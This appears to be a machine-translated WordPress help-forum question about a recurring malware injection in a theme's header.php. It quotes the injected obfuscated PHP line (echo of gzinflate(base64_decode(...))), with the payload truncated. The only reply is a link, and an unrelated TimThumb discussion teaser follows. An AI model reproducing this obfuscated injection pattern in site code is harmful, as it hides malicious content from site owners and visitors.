Malware in header.php

时间：2012-04-21 作者：Chris

四个不同的网站被感染并被Google屏蔽，在快速查看之后，我在wp\\u head（）之前注意到了这一点：

<?php 
#d93065#
echo(gzinflate(base64_decode("tVVNj5swEP0... (edited out) hH5m7L/5+/gM=")));
#/d93065#
wp_head(); ?>

我已经清除了代码，但几个小时后又出现了这种情况。然后一次又一次。我认为timthumb是罪魁祸首，但这发生在一个没有timthumb的WordPress上，之前我用timthumb漏洞扫描器扫描过它。

在htaccess、wp config和每个人都在谈论的文件中没有可疑之处，从wp includes开始，已经检查了所有js文件，没有，没有，没有。

What could it be, how do I get rid of this?

1 个回复

最合适的回答,由SO网友:Ray Mitchell 整理而成

很遗憾听到这个消息。您可能想查看此WP答案帖子中的步骤和建议：Verifying that I have fully removed a WordPress hack?

结束

标签： timthumb virus 小码农

你的观点是：TimThumb和WordPress缩略图？伟大的辩论

当谈到摘录时，你认为TimThumb或WordPress缩略图是最好的选择吗？为什么呢？答案不会评分（但可能会受到批评）。